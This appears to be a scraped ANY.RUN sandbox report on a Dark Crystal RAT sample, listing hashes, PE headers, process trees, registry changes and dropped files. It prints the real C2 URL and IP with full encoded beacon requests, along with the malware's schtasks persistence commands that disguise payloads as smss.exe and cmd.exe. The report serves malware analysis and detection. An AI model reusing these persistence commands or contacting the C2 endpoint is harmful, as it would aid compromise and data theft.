analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b3fe05feed5ce43ecc5968a72467aff2.exe

Full analysis: https://app.any.run/tasks/d31275b5-51dd-4645-a69f-04bb3a6449a9
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: April 01, 2023, 04:31:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
rat
backdoor
dcrat
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

B3FE05FEED5CE43ECC5968A72467AFF2

SHA1:

B1C47D779B4F6B579E28B47C64F1BADC8E0ACC5A

SHA256:

050F5866D9BCA42881CF88386BF408E30CA584B1B19030FA94B131E722DD4792

SSDEEP:

24576:h2G/nvxW3WfkUJaFRxxLyRH7jR170gt1HL:hbA31UMFvx2hJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Connects to the CnC server

      • spoolsv.exe (PID: 2292)
    • DCRAT was detected

      • spoolsv.exe (PID: 2292)
    • DCRAT detected by memory dumps

      • spoolsv.exe (PID: 2292)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1896)
      • b3fe05feed5ce43ecc5968a72467aff2.exe (PID: 2032)
      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Executable content was dropped or overwritten

      • b3fe05feed5ce43ecc5968a72467aff2.exe (PID: 2032)
      • hostDhcpsvc.exe (PID: 340)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1896)
      • hostDhcpsvc.exe (PID: 340)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 1896)
      • hostDhcpsvc.exe (PID: 340)
    • Executed via WMI

      • schtasks.exe (PID: 1896)
      • schtasks.exe (PID: 2108)
      • schtasks.exe (PID: 1504)
      • schtasks.exe (PID: 504)
      • schtasks.exe (PID: 2220)
      • schtasks.exe (PID: 840)
      • schtasks.exe (PID: 1036)
      • schtasks.exe (PID: 2824)
      • schtasks.exe (PID: 2252)
      • schtasks.exe (PID: 2928)
      • schtasks.exe (PID: 3056)
      • schtasks.exe (PID: 2464)
      • schtasks.exe (PID: 2588)
      • schtasks.exe (PID: 2316)
      • schtasks.exe (PID: 2672)
      • schtasks.exe (PID: 2128)
      • schtasks.exe (PID: 2456)
      • schtasks.exe (PID: 2356)
    • Creates executable files that already exist in Windows

      • hostDhcpsvc.exe (PID: 340)
    • The process creates files with name similar to system file names

      • hostDhcpsvc.exe (PID: 340)
    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 2832)
  • INFO

    • Reads the computer name

      • b3fe05feed5ce43ecc5968a72467aff2.exe (PID: 2032)
      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Checks supported languages

      • b3fe05feed5ce43ecc5968a72467aff2.exe (PID: 2032)
      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • The process checks LSA protection

      • b3fe05feed5ce43ecc5968a72467aff2.exe (PID: 2032)
      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Reads the machine GUID from the registry

      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Reads Environment values

      • hostDhcpsvc.exe (PID: 340)
      • spoolsv.exe (PID: 2292)
    • Creates files in the program directory

      • hostDhcpsvc.exe (PID: 340)
    • Create files in a temporary directory

      • hostDhcpsvc.exe (PID: 340)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(2292) spoolsv.exe
Options
Targetals
searchpath%UsersFolder% - Fast
MutexDCR_MUTEX-qADSYnlpmdrsGo4VS1IO
C2 (1)http://686084.clmonth.nyashteam.top/@lRXY2lmcwNnS
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x1ec40
UninitializedDataSize: -
InitializedDataSize: 77824
CodeSize: 201216
LinkerVersion: 14
PEType: PE32
ImageFileCharacteristics: Executable, 32-bit
TimeStamp: 2020:12:01 18:00:55+00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Dec-2020 18:00:55
Detected languages:
  • English - United States
  • Process Default Language
Debug artifacts:
  • D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000118

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 01-Dec-2020 18:00:55
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000310EA
0x00031200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.70808
.rdata
0x00033000
0x0000A612
0x0000A800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.22174
.data
0x0003E000
0x00023728
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.70882
.didat
0x00062000
0x00000188
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.29825
.rsrc
0x00063000
0x000051E8
0x00005200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.3888
.reloc
0x00069000
0x00002268
0x00002400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.55486

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.26192
1875
Latin 1 / Western European
English - United States
RT_MANIFEST
7
3.1586
482
Latin 1 / Western European
English - United States
RT_STRING
8
3.11685
460
Latin 1 / Western European
English - United States
RT_STRING
9
3.11236
440
Latin 1 / Western European
English - United States
RT_STRING
10
2.99727
326
Latin 1 / Western European
English - United States
RT_STRING
11
3.2036
1094
Latin 1 / Western European
English - United States
RT_STRING
12
3.12889
358
Latin 1 / Western European
English - United States
RT_STRING
13
3.01704
338
Latin 1 / Western European
English - United States
RT_STRING
14
2.94627
266
Latin 1 / Western European
English - United States
RT_STRING
15
2.83619
188
Latin 1 / Western European
English - United States
RT_STRING

Imports

KERNEL32.dll
USER32.dll (delay-loaded)
gdiplus.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
59
Monitored processes
26
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start b3fe05feed5ce43ecc5968a72467aff2.exe no specs b3fe05feed5ce43ecc5968a72467aff2.exe wscript.exe no specs cmd.exe no specs hostdhcpsvc.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs w32tm.exe no specs #DCRAT spoolsv.exe

Process information

PID
CMD
Path
Indicators
Parent process
1464"C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\b3fe05feed5ce43ecc5968a72467aff2.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2032"C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe" C:\Users\admin\AppData\Local\Temp\b3fe05feed5ce43ecc5968a72467aff2.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\b3fe05feed5ce43ecc5968a72467aff2.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1896"C:\Windows\System32\WScript.exe" "C:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbe" C:\Windows\SysWOW64\wscript.exeb3fe05feed5ce43ecc5968a72467aff2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1660C:\Windows\system32\cmd.exe /c ""C:\blockagentWincrt\OnRVU.bat" "C:\Windows\SysWOW64\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
340"C:\blockagentWincrt\hostDhcpsvc.exe"C:\blockagentWincrt\hostDhcpsvc.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1.1.1o
Modules
Images
c:\blockagentwincrt\hostdhcpsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
504schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1896schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\usp10.dll
840schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Windows\IME\IMESC5\DICTS\smss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1504schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\CBS\cmd.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
1036schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\CBS\cmd.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
Total events
4 102
Read events
4 054
Write events
48
Delete events
0

Modification events

(PID) Process:(2032) b3fe05feed5ce43ecc5968a72467aff2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2032) b3fe05feed5ce43ecc5968a72467aff2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2032) b3fe05feed5ce43ecc5968a72467aff2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2032) b3fe05feed5ce43ecc5968a72467aff2.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1896) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(340) hostDhcpsvc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(340) hostDhcpsvc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
14
Suspicious files
0
Text files
18
Unknown types
2

Dropped files

PID
Process
Filename
Type
2032b3fe05feed5ce43ecc5968a72467aff2.exeC:\blockagentWincrt\OnRVU.battext
MD5:A8D7E9F3DB5423AB33C4C97252E92DE6
SHA256:BAB57932EB46F7496D17D548A0F41331D2B1EA9E01CD59A54E5A07684507F6E4
340hostDhcpsvc.exeC:\Windows\IME\IMESC5\DICTS\69ddcba757bf72text
MD5:2A5C89319378DCC9A0C92361CEF8CEAD
SHA256:1E7494AE47811F75A044A6C8E7DED01541978B0A9390E2A069C06B944B28DA3C
2032b3fe05feed5ce43ecc5968a72467aff2.exeC:\blockagentWincrt\Ct0r69Us2cLOmGEvM4uxv1.vbevbe
MD5:81DA2831BF2FEB8ACE4E74C87D1A8604
SHA256:2A14D99C768A25A7DB8959C449BFE7AC039B4AF7CA6DDBF62E89A92F6C482676
340hostDhcpsvc.exeC:\Windows\Logs\CBS\ebf1f9fa8afd6dtext
MD5:105A6089512FD7FFD5D304614F9EA01F
SHA256:D6F24271E2ECA62B5F175601271FBC356C3F7B4CCB26A46241EA1C9605A8F957
340hostDhcpsvc.exeC:\found.000\7a0fd90576e088text
MD5:601AC9AE1296A7BDBB7B6071253ED84D
SHA256:F2715ACF480B4D31663A5E927991A58AF17A97A004A96573F0865D955A1A9D6F
340hostDhcpsvc.exeC:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\f3b6ecef712a24text
MD5:179EF856AD597B827333F661A4166FEE
SHA256:C135C265AD763423C1848B8DC0D05DB374200AF0FAF9E575A995D88C5EA222A9
340hostDhcpsvc.exeC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\PTB\101b941d020240text
MD5:12867B8361CC58D8037C060D19B15E0A
SHA256:9A7CA44AD66B689F0011A9E0E64DC72E95245C5EEC24617C3B147866D9A8FE2C
340hostDhcpsvc.exeC:\found.000\explorer.exeexecutable
MD5:82FA25A9FBEFD9602DD338788512903E
SHA256:2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC
340hostDhcpsvc.exeC:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\explorer.exeexecutable
MD5:82FA25A9FBEFD9602DD338788512903E
SHA256:2965473ECC25AA7BB84CB7A86A5436D82002AAA6964049D5ADDDFD6CDD96F6CC
340hostDhcpsvc.exeC:\Users\admin\AppData\Local\Temp\sPGQ3IzL2itext
MD5:9881633857A2797D79FE5B921FE65617
SHA256:97B5B4CDCEC0EE6ECE92DEE3393034E325A35842D545E58774808AB34116C6B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
78
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&32e531e655eaad7c57fc0081c6a6bfd1=d1nI5oUaatmWH90dJpXT4V1RP1mRXxkMjRVWoFzQPxmRU1EdrRVW5FEVMhmW65ENJR0TsJ1RYNGbuNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0c3dkYxUTbPlWSYpleWZlYoZ1RkRlSDx0c4dFZ1BnaJ5WNXlVTxcVWsJ1MVl2dplEdGdlWw40MMBXWE9ENoNUS6Z1RiBnWHlEdG12YulTbjdXOp9kaKl2Tpd2RkhmQWJGaWdEZUp0QMl2a5JGcSdFZCJUeOVzY5FlQClXYsJFSihmVtV1bBlmYKJ0UaVHbHRVd4x2YjlzVhtmVYF1ZjR1Tu1UVRd2cXpFM4dVWspkRLdWVtJmdod0Y2p0MZBXMrlkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlWRqx0M0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI5ETNhNGZjBzY0E2Y2QWYwIWM0EDZ0EDM2MWY0MWZwEGNjZTYlNGZjJiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
2.13 Kb
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN&ca16cbf4abd5e18c7238ba2d26e37d1b=b38619f9986806ad85e919fe27d3506a&c046c2ee8690509603eb62347da0996c=wYmZDMxYTZ3UDO4IDMiNWY0YTYkJjY0AzM2kjMlFTN2MTNlZmMjZWY&OfETBOKf9l6aw1xEuS2QxSLbsF=t2wvZOdU8aJPVkn89JBL&HcyltfA5Unl6=bmNzgMShyolChpKULSq4&lZ7KpscZo=hSsJBvKmz2yTyMiM00kIU5CXzN
RU
text
2.13 Kb
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35